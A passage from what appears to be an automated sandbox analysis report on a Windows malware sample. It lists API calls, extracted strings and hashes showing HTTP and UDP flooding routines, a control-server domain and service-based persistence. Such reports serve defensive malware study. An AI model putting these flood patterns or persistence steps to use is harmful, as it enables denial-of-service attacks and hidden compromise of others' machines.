                                • Associated: 00000004.00000002.3268425221.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3275349436.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileModuleName
                                • String ID:
                                • API String ID: 514040917-0
                                • Opcode ID: 1499fcb644ca70f17a514ae5522f0da01c8a4b91eeac3f71c21a923c145b40a4
                                • Instruction ID: 64dc199527a0429f388a9fd382f518a580a3f98e4aa8d30c949afc931af75c40
                                • Opcode Fuzzy Hash: 1499fcb644ca70f17a514ae5522f0da01c8a4b91eeac3f71c21a923c145b40a4
                                • Instruction Fuzzy Hash: C5E012F6A0425C7BEF609668DD86FC5B7B8A754704F0004F2E789B60D0D6F06ACD8E55
                                Function 004030FD Relevance: 1.5, APIs: 1, Instructions: 9threadCOMMON
                                Download Yara Rule
                                APIs
                                • CreateThread.KERNELBASE(00000000,00000000,?,?,00000000,00000000), ref: 0040310B
                                Memory Dump Source
                                • Source File: 00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.3254435227.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3258916401.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3268425221.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3275349436.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateThread
                                • String ID:
                                • API String ID: 2422867632-0
                                • Opcode ID: 5bf4f389a55ba3d56e94b3af9fbd44d165b497852bd63959914ec1e092303f7a
                                • Instruction ID: 5b36b277475b3b2f29725254a5d092a25ff950edcda12b5ed3701cdde0b1e55c
                                • Opcode Fuzzy Hash: 5bf4f389a55ba3d56e94b3af9fbd44d165b497852bd63959914ec1e092303f7a
                                • Instruction Fuzzy Hash: ADB002B6514381BFFB41DFA09E18C3BBAADFB94301B054C19B9D1D1524D7358868DB35
                                Function 00405336 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                Download Yara Rule
                                APIs
                                • EnumResourceNamesA.KERNEL32(00000000,0000000A,Function_00005244,00000000), ref: 00405341
                                Memory Dump Source
                                • Source File: 00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.3254435227.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3258916401.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3268425221.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3275349436.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: EnumNamesResource
                                • String ID:
                                • API String ID: 3334572018-0
                                • Opcode ID: 994779acdd13945076b11be33b1db5ce95c1c4d32d58db4b2fc17c908424ab8f
                                • Instruction ID: 317f5d7f5b6160c4595255c7946ecd39f0252e0528535c85dd973ab848fd640b
                                • Opcode Fuzzy Hash: 994779acdd13945076b11be33b1db5ce95c1c4d32d58db4b2fc17c908424ab8f
                                • Instruction Fuzzy Hash: 95A00120BC474066ED6066606E4BF052520AB52F46F2001A5B2467D4E445E420418D5A

                                Non-executed Functions

                                Function 00407470 Relevance: 165.6, APIs: 71, Strings: 23, Instructions: 1065libraryloadersleepCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryA.KERNEL32(WS2_32.dll,htons), ref: 004074A4
                                • GetProcAddress.KERNEL32(00000000), ref: 004074AD
                                • LoadLibraryA.KERNEL32(WS2_32.dll,setsockopt), ref: 004074BB
                                • GetProcAddress.KERNEL32(00000000), ref: 004074BE
                                • LoadLibraryA.KERNEL32(WS2_32.dll,WSAStartup), ref: 004074CE
                                • GetProcAddress.KERNEL32(00000000), ref: 004074D1
                                • socket.WS2_32(00000002,00000003,000000FF), ref: 004075A9
                                • inet_addr.WS2_32 ref: 0040764A
                                • sendto.WS2_32(?,?,00000033,00000000,?,00000010), ref: 0040789E
                                • RtlExitUserThread.NTDLL(00000000), ref: 004078E3
                                • LoadLibraryA.KERNEL32(WS2_32.dll,closesocket), ref: 00407904
                                • GetProcAddress.KERNEL32(00000000), ref: 0040790B
                                • wsprintfA.USER32 ref: 0040799E
                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00407A07
                                • Sleep.KERNEL32(000007D0), ref: 00407A12
                                • TerminateProcess.KERNEL32(?,00000000), ref: 00407A1B
                                • Sleep.KERNEL32(0000000A), ref: 00407A1F
                                • RtlExitUserThread.NTDLL(00000000), ref: 00407A25
                                • wsprintfA.USER32 ref: 00407A7B
                                • send.WS2_32(00000000,?,?,00000000), ref: 00407ACE
                                • Sleep.KERNEL32(00000032,?,00000000), ref: 00407AD9
                                • RtlExitUserThread.NTDLL(00000000), ref: 00407AE4
                                • LoadLibraryA.KERNEL32(WS2_32.dll,closesocket,?,00000001,00000000,76F90F00), ref: 00407B04
                                • GetProcAddress.KERNEL32(00000000), ref: 00407B0B
                                • wsprintfA.USER32 ref: 00407B90
                                  • Part of subcall function 00406C50: LoadLibraryA.KERNEL32(KERNEL32.dll,GetSystemDirectoryA), ref: 00406C6A
                                  • Part of subcall function 00406C50: GetProcAddress.KERNEL32(00000000), ref: 00406C73
                                  • Part of subcall function 00406C50: LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcatA), ref: 00406C81
                                  • Part of subcall function 00406C50: GetProcAddress.KERNEL32(00000000), ref: 00406C84
                                  • Part of subcall function 00406C50: LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcpyA), ref: 00406C92
                                  • Part of subcall function 00406C50: GetProcAddress.KERNEL32(00000000), ref: 00406C95
                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00407C17
                                • Sleep.KERNEL32(00001388), ref: 00407C26
                                • TerminateProcess.KERNEL32(?,00000000), ref: 00407C33
                                • wsprintfA.USER32 ref: 00407C6C
                                • wsprintfA.USER32 ref: 00407C91
                                  • Part of subcall function 00406BD0: LoadLibraryA.KERNEL32(KERNEL32.dll,GetTickCount,Defghi Klmnopqr Tuv,00404D28,0000001A), ref: 00406BDB
                                  • Part of subcall function 00406BD0: GetProcAddress.KERNEL32(00000000), ref: 00406BE2
                                • send.WS2_32(00000000,?,?,00000000), ref: 00407D69
                                • Sleep.KERNEL32(0000000A,?,00000000), ref: 00407D70
                                • RtlExitUserThread.NTDLL(00000000), ref: 00407D7A
                                • LoadLibraryA.KERNEL32(WS2_32.dll,htons), ref: 00407DAA
                                • GetProcAddress.KERNEL32(00000000), ref: 00407DB3
                                • LoadLibraryA.KERNEL32(WS2_32.dll,setsockopt), ref: 00407DC1
                                • GetProcAddress.KERNEL32(00000000), ref: 00407DC4
                                • socket.WS2_32(00000002,00000002,00000000), ref: 00407E2A
                                • sendto.WS2_32(00000000,?,-00000800,00000000,?,00000010), ref: 00407EA5
                                • Sleep.KERNEL32(00000005), ref: 00407EB7
                                • RtlExitUserThread.NTDLL(00000000), ref: 00407ECD
                                • LoadLibraryA.KERNEL32(WS2_32.dll,closesocket), ref: 00407EF4
                                • GetProcAddress.KERNEL32(00000000), ref: 00407EFB
                                • wsprintfA.USER32 ref: 00407F74
                                • wsprintfA.USER32 ref: 00407FB6
                                • send.WS2_32(00000000,?,?,00000000), ref: 00408010
                                • Sleep.KERNEL32(00000032,?,00000000), ref: 00408019
                                • RtlExitUserThread.NTDLL(00000000), ref: 0040801F
                                • LoadLibraryA.KERNEL32(WS2_32.dll,closesocket), ref: 00408044
                                • GetProcAddress.KERNEL32(00000000), ref: 0040804B
                                • wsprintfA.USER32 ref: 004080B3
                                • wsprintfA.USER32 ref: 004080CF
                                  • Part of subcall function 00406C10: LoadLibraryA.KERNEL32(WS2_32.dll,gethostbyname,76F8F550,76F90BD0,00404875,chinagov.8800.org), ref: 00406C1C
                                  • Part of subcall function 00406C10: GetProcAddress.KERNEL32(00000000), ref: 00406C23
                                  • Part of subcall function 00406C10: inet_addr.WS2_32(?), ref: 00406C30
                                  • Part of subcall function 00406C10: gethostbyname.WS2_32(?), ref: 00406C3B
                                  • Part of subcall function 00408680: socket.WS2_32(00000002,00000001,00000000), ref: 0040868A
                                • send.WS2_32(00000000,?,?,00000000), ref: 00408110
                                • Sleep.KERNEL32(00000005,?,00000000), ref: 00408119
                                • RtlExitUserThread.NTDLL(00000000), ref: 00408126
                                • LoadLibraryA.KERNEL32(WS2_32.dll,gethostbyname), ref: 0040816D
                                • GetProcAddress.KERNEL32(00000000), ref: 00408176
                                • LoadLibraryA.KERNEL32(WS2_32.dll,htons), ref: 00408185
                                • GetProcAddress.KERNEL32(00000000), ref: 00408188
                                • LoadLibraryA.KERNEL32(WS2_32.dll,setsockopt), ref: 0040819A
                                • GetProcAddress.KERNEL32(00000000), ref: 0040819D
                                • LoadLibraryA.KERNEL32(WS2_32.dll,WSAStartup), ref: 004081AC
                                • GetProcAddress.KERNEL32(00000000), ref: 004081AF
                                • LoadLibraryA.KERNEL32(WS2_32.dll,closesocket), ref: 004081BE
                                • GetProcAddress.KERNEL32(00000000), ref: 004081C1
                                • LoadLibraryA.KERNEL32(WS2_32.dll,WSASocketA), ref: 004081D3
                                • GetProcAddress.KERNEL32(00000000), ref: 004081D6
                                • LoadLibraryA.KERNEL32(WS2_32.dll,gethostname), ref: 004081E5
                                • GetProcAddress.KERNEL32(00000000), ref: 004081E8
                                Strings
                                • GET %s HTTP/1.1Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*Accept-Language: zh-cnAccept-Encoding: gzip, deflateUser-Agent:Mo, xrefs: 00407F6E
                                • a, xrefs: 004075F7
                                • GET %s HTTP/1.1Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*Accept-Language: zh-cnAccept-Encoding: gzip, deflateUser-Agent:Mo, xrefs: 004080C9
                                • WS2_32.dll, xrefs: 00407487, 004074B4, 004074C5, 004078FF, 00407AFF, 00407DA5, 00407DBA, 00407EEF, 0040803F, 00408162, 00408180, 00408195, 004081A7, 004081B9, 004081CE, 004081E0
                                • GET %s HTTP/1.1Host: %s, xrefs: 00407C66
                                • GET %s HTTP/1.1Host: %s:%d, xrefs: 00407C8B
                                • a, xrefs: 004075FF
                                • GET %s HTTP/1.1Content-Type: text/htmlHost: %sAccept: text/html, */*User-Agent:Mozilla/5.0 (X11; U; Linux i686; en-US; re:1.4.0) Gecko/20080808 Firefox/%d.0, xrefs: 00407A6E
                                • gethostname, xrefs: 004081DB
                                • GET %s HTTP/1.1Content-Type: text/htmlHost: %sAccept: text/html, */*User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01), xrefs: 00407CD0
                                • closesocket, xrefs: 004078FA, 00407AFA, 00407EEA, 0040803A, 004081B4
                                • GET %s HTTP/1.1Content-Type: text/htmlHost: %s:%dAccept: text/html, */*User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01), xrefs: 00407D13
                                • GET %s HTTP/1.1Referer: http://%s:80/http://%sHost: %sConnection: CloseCache-Control: no-cache, xrefs: 00407A4F
                                • E, xrefs: 0040760C
                                • htons, xrefs: 00407482, 00407DA0, 0040817B
                                • D, xrefs: 00407B9D
                                • gethostbyname, xrefs: 0040815D
                                • %s %s%s, xrefs: 00407998, 00407B8A
                                • GET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#, xrefs: 00407BC9
                                • setsockopt, xrefs: 004074AF, 00407DB5, 00408190
                                • GET %s HTTP/1.1Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*Accept-Language: zh-cnAccept-Encoding: gzip, deflateUser-Agent:Mo, xrefs: 00407FB0
                                • WSAStartup, xrefs: 004074C0, 004081A2
                                • WSASocketA, xrefs: 004081C9
                                Memory Dump Source
                                • Source File: 00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.3254435227.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3258916401.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3268425221.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3275349436.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressLibraryLoadProc$wsprintf$Sleep$ExitThreadUser$Processsend$socket$CreateTerminateinet_addrsendto$gethostbyname
                                • String ID: %s %s%s$D$E$GET %s HTTP/1.1Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*Accept-Language: zh-cnAccept-Encoding: gzip, deflateUser-Agent:Mo$GET %s HTTP/1.1Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*Accept-Language: zh-cnAccept-Encoding: gzip, deflateUser-Agent:Mo$GET %s HTTP/1.1Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*Accept-Language: zh-cnAccept-Encoding: gzip, deflateUser-Agent:Mo$GET %s HTTP/1.1Content-Type: text/htmlHost: %sAccept: text/html, */*User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)$GET %s HTTP/1.1Content-Type: text/htmlHost: %sAccept: text/html, */*User-Agent:Mozilla/5.0 (X11; U; Linux i686; en-US; re:1.4.0) Gecko/20080808 Firefox/%d.0$GET %s HTTP/1.1Content-Type: text/htmlHost: %s:%dAccept: text/html, */*User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)$GET %s HTTP/1.1Host: %s$GET %s HTTP/1.1Host: %s:%d$GET %s HTTP/1.1Referer: http://%s:80/http://%sHost: %sConnection: CloseCache-Control: no-cache$GET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#$WS2_32.dll$WSASocketA$WSAStartup$a$a$closesocket$gethostbyname$gethostname$htons$setsockopt
                                • API String ID: 1429884815-199250815
                                • Opcode ID: aef3f8ff331de28161243151cb282a45085878c6413215fd1f1b1c987d615d29
                                • Instruction ID: 3928dce49adfbc52beb91163b4814508b45c4256773abad5793f3461048422d7
                                • Opcode Fuzzy Hash: aef3f8ff331de28161243151cb282a45085878c6413215fd1f1b1c987d615d29
                                • Instruction Fuzzy Hash: 6282A271548385ABE320DB64CD45BEFBBE5EFC4704F00493EF685A7290DA74A9048B9B
                                Function 00405B10 Relevance: 96.6, APIs: 37, Strings: 18, Instructions: 346libraryloaderstringCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryA.KERNEL32(ADVAPI32.dll,RegCloseKey), ref: 00405B47
                                • GetProcAddress.KERNEL32(00000000), ref: 00405B50
                                • LoadLibraryA.KERNEL32(ADVAPI32.dll,OpenSCManagerA), ref: 00405B5E
                                • GetProcAddress.KERNEL32(00000000), ref: 00405B61
                                • LoadLibraryA.KERNEL32(ADVAPI32.dll,OpenServiceA), ref: 00405B6F
                                • GetProcAddress.KERNEL32(00000000), ref: 00405B72
                                • LoadLibraryA.KERNEL32(ADVAPI32.dll,CloseServiceHandle), ref: 00405B80
                                • GetProcAddress.KERNEL32(00000000), ref: 00405B83
                                • LoadLibraryA.KERNEL32(KERNEL32.dll,CopyFileA), ref: 00405B95
                                • GetProcAddress.KERNEL32(00000000), ref: 00405B98
                                • LoadLibraryA.KERNEL32(ADVAPI32.dll,RegSetValueExA), ref: 00405BA6
                                • GetProcAddress.KERNEL32(00000000), ref: 00405BA9
                                • LoadLibraryA.KERNEL32(ADVAPI32.dll,StartServiceA), ref: 00405BB7
                                • GetProcAddress.KERNEL32(00000000), ref: 00405BBA
                                • LoadLibraryA.KERNEL32(ADVAPI32.dll,RegOpenKeyA), ref: 00405BC8
                                • GetProcAddress.KERNEL32(00000000), ref: 00405BCB
                                • LoadLibraryA.KERNEL32(ADVAPI32.dll,UnlockServiceDatabase), ref: 00405BD9
                                • GetProcAddress.KERNEL32(00000000), ref: 00405BDC
                                • LoadLibraryA.KERNEL32(ADVAPI32.dll,ChangeServiceConfig2A), ref: 00405BEA
                                • GetProcAddress.KERNEL32(00000000), ref: 00405BED
                                • LoadLibraryA.KERNEL32(ADVAPI32.dll,CreateServiceA), ref: 00405BFB
                                • GetProcAddress.KERNEL32(00000000), ref: 00405BFE
                                • LoadLibraryA.KERNEL32(ADVAPI32.dll,LockServiceDatabase), ref: 00405C09
                                • GetProcAddress.KERNEL32(00000000), ref: 00405C0C
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00405C24
                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00405C32
                                • strlen.MSVCRT ref: 00405C3F
                                • strncmp.MSVCRT ref: 00405C53
                                • GetLastError.KERNEL32 ref: 00405E3E
                                  • Part of subcall function 00406BD0: LoadLibraryA.KERNEL32(KERNEL32.dll,GetTickCount,Defghi Klmnopqr Tuv,00404D28,0000001A), ref: 00406BDB
                                  • Part of subcall function 00406BD0: GetProcAddress.KERNEL32(00000000), ref: 00406BE2
                                • wsprintfA.USER32 ref: 00405CB5
                                • _mbscat.MSVCRT ref: 00405CC7
                                • _mbscat.MSVCRT ref: 00405CDA
                                • memset.MSVCRT ref: 00405D00
                                • _mbscpy.MSVCRT(?,?,?,00000000,00000104), ref: 00405D13
                                • _mbscpy.MSVCRT(?,SYSTEM\CurrentControlSet\Services\), ref: 00405F8E
                                • _mbscat.MSVCRT ref: 00405F9D
                                • lstrlen.KERNEL32(004059DB), ref: 00406014
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.3254435227.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3258916401.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3268425221.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3275349436.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressLibraryLoadProc$_mbscat$_mbscpy$DirectoryErrorFileLastModuleNameWindowslstrlenmemsetstrlenstrncmpwsprintf
                                • String ID: %c%c%c%c%c%c.exe$ADVAPI32.dll$ChangeServiceConfig2A$CloseServiceHandle$CopyFileA$CreateServiceA$Defghijk Mnopqrstu Wxyabcd Fghijklm Opq$Description$KERNEL32.dll$LockServiceDatabase$OpenSCManagerA$OpenServiceA$RegCloseKey$RegOpenKeyA$RegSetValueExA$SYSTEM\CurrentControlSet\Services\$StartServiceA$UnlockServiceDatabase
                                • API String ID: 386357465-766656692
                                • Opcode ID: 0664e4838cc323b1f4e72241ddd9614066d39b97ab9bfac67c13d6ea83ed0be3
                                • Instruction ID: cb804ed11c5d1b7d2f4ad966b6bff0d4186705c14a699b97b59b11ec4e5a602e
                                • Opcode Fuzzy Hash: 0664e4838cc323b1f4e72241ddd9614066d39b97ab9bfac67c13d6ea83ed0be3
                                • Instruction Fuzzy Hash: BCE168B1C0426CABDB229B65CC49BDEBEBCAF15744F0440EAE10CB6191C7B95B848F65
                                Function 00406DB0 Relevance: 65.1, APIs: 29, Strings: 8, Instructions: 379libraryloaderthreadCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryA.KERNEL32(WS2_32.dll,htons), ref: 00406DCA
                                • GetProcAddress.KERNEL32(00000000), ref: 00406DD3
                                • LoadLibraryA.KERNEL32(WS2_32.dll,setsockopt), ref: 00406DE1
                                • GetProcAddress.KERNEL32(00000000), ref: 00406DE4
                                  • Part of subcall function 00406BD0: LoadLibraryA.KERNEL32(KERNEL32.dll,GetTickCount,Defghi Klmnopqr Tuv,00404D28,0000001A), ref: 00406BDB
                                  • Part of subcall function 00406BD0: GetProcAddress.KERNEL32(00000000), ref: 00406BE2
                                  • Part of subcall function 00406C10: LoadLibraryA.KERNEL32(WS2_32.dll,gethostbyname,76F8F550,76F90BD0,00404875,chinagov.8800.org), ref: 00406C1C
                                  • Part of subcall function 00406C10: GetProcAddress.KERNEL32(00000000), ref: 00406C23
                                  • Part of subcall function 00406C10: inet_addr.WS2_32(?), ref: 00406C30
                                  • Part of subcall function 00406C10: gethostbyname.WS2_32(?), ref: 00406C3B
                                • socket.WS2_32(00000002,00000002,00000000), ref: 00406E79
                                • sendto.WS2_32(00000000,?,-00000401,00000000,?,00000010), ref: 00406EC6
                                • Sleep.KERNEL32(00000014), ref: 00406ECD
                                • RtlExitUserThread.NTDLL(00000000), ref: 00406EDE
                                • LoadLibraryA.KERNEL32(WS2_32.dll,closesocket), ref: 00406F0A
                                • GetProcAddress.KERNEL32(00000000), ref: 00406F13
                                • LoadLibraryA.KERNEL32(WS2_32.dll,htons), ref: 00406F21
                                • GetProcAddress.KERNEL32(00000000), ref: 00406F24
                                • LoadLibraryA.KERNEL32(WS2_32.dll,WSAStartup), ref: 00406F32
                                • GetProcAddress.KERNEL32(00000000), ref: 00406F35
                                • socket.WS2_32(00000002,00000001,00000006), ref: 00406F97
                                • connect.WS2_32(00000000,?,00000010), ref: 00406FA7
                                • send.WS2_32(00000000,?,00000800,00000000), ref: 0040702E
                                • Sleep.KERNEL32(0000000A), ref: 00407032
                                • RtlExitUserThread.NTDLL(00000000), ref: 0040703B
                                • LoadLibraryA.KERNEL32(KERNEL32.dll,GetTickCount,761E58A0,00000000,00000000,76F90F00), ref: 0040706E
                                • GetProcAddress.KERNEL32(00000000), ref: 00407077
                                • LoadLibraryA.KERNEL32(WS2_32.dll,WSAStartup), ref: 00407087
                                • GetProcAddress.KERNEL32(00000000), ref: 0040708A
                                • LoadLibraryA.KERNEL32(WS2_32.dll,WSASocketA), ref: 00407098
                                • GetProcAddress.KERNEL32(00000000), ref: 0040709B
                                • sendto.WS2_32(00000000,?,0000100C,00000000,?,00000010), ref: 004071A3
                                • RtlExitUserThread.NTDLL(00000000), ref: 004071AB
                                • Sleep.KERNEL32(000001F4), ref: 00407210
                                • RtlExitUserThread.NTDLL(00000000,?,00000000), ref: 00407216
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.3254435227.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3258916401.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3268425221.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3275349436.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressLibraryLoadProc$ExitThreadUser$Sleep$sendtosocket$connectgethostbynameinet_addrsend
                                • String ID: GetTickCount$KERNEL32.dll$WS2_32.dll$WSASocketA$WSAStartup$closesocket$htons$setsockopt
                                • API String ID: 1080867297-3926040945
                                • Opcode ID: f8a2499b1aef589c456f9f75b8d754b15eace620b909dc858667b967397af7d0
                                • Instruction ID: 108494642a65384e92ce671c93e0be5eb4aeb19d0da13a5ceb95eb50e5242d09
                                • Opcode Fuzzy Hash: f8a2499b1aef589c456f9f75b8d754b15eace620b909dc858667b967397af7d0
                                • Instruction Fuzzy Hash: 6BB118716483446BE314EB64DC05FAF77E5EBC9704F01093EF645BB2D0DAB89904879A
                                Function 00408130 Relevance: 61.6, APIs: 23, Strings: 12, Instructions: 327libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryA.KERNEL32(WS2_32.dll,gethostbyname), ref: 0040816D
                                • GetProcAddress.KERNEL32(00000000), ref: 00408176
                                • LoadLibraryA.KERNEL32(WS2_32.dll,htons), ref: 00408185
                                • GetProcAddress.KERNEL32(00000000), ref: 00408188
                                • LoadLibraryA.KERNEL32(WS2_32.dll,setsockopt), ref: 0040819A
                                • GetProcAddress.KERNEL32(00000000), ref: 0040819D
                                • LoadLibraryA.KERNEL32(WS2_32.dll,WSAStartup), ref: 004081AC
                                • GetProcAddress.KERNEL32(00000000), ref: 004081AF
                                • LoadLibraryA.KERNEL32(WS2_32.dll,closesocket), ref: 004081BE
                                • GetProcAddress.KERNEL32(00000000), ref: 004081C1
                                • LoadLibraryA.KERNEL32(WS2_32.dll,WSASocketA), ref: 004081D3
                                • GetProcAddress.KERNEL32(00000000), ref: 004081D6
                                • LoadLibraryA.KERNEL32(WS2_32.dll,gethostname), ref: 004081E5
                                • GetProcAddress.KERNEL32(00000000), ref: 004081E8
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.3254435227.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3258916401.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3268425221.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3275349436.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressLibraryLoadProc
                                • String ID: %d.%d.%d.%d$($E$P$WS2_32.dll$WSASocketA$WSAStartup$closesocket$gethostbyname$gethostname$htons$setsockopt
                                • API String ID: 2574300362-3688028543
                                • Opcode ID: 4a3c82638dccf32fa90216d1273ea8970814657705a3f54d8f00e494abda61eb
                                • Instruction ID: 53d6d929515b9e91ab4b685de5499f61474fe8fa857c4809401ddf33aa41e7a7
                                • Opcode Fuzzy Hash: 4a3c82638dccf32fa90216d1273ea8970814657705a3f54d8f00e494abda61eb
                                • Instruction Fuzzy Hash: A1D16EB5D402699BDB20DBA4CD89FEDB7B5EF94304F0040AEE249B7290DBB459C08F59
                                Function 00406C50 Relevance: 57.8, APIs: 6, Strings: 27, Instructions: 99libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryA.KERNEL32(KERNEL32.dll,GetSystemDirectoryA), ref: 00406C6A
                                • GetProcAddress.KERNEL32(00000000), ref: 00406C73
                                • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcatA), ref: 00406C81
                                • GetProcAddress.KERNEL32(00000000), ref: 00406C84
                                • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcpyA), ref: 00406C92
                                • GetProcAddress.KERNEL32(00000000), ref: 00406C95
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.3254435227.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3258916401.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3268425221.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3275349436.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressLibraryLoadProc
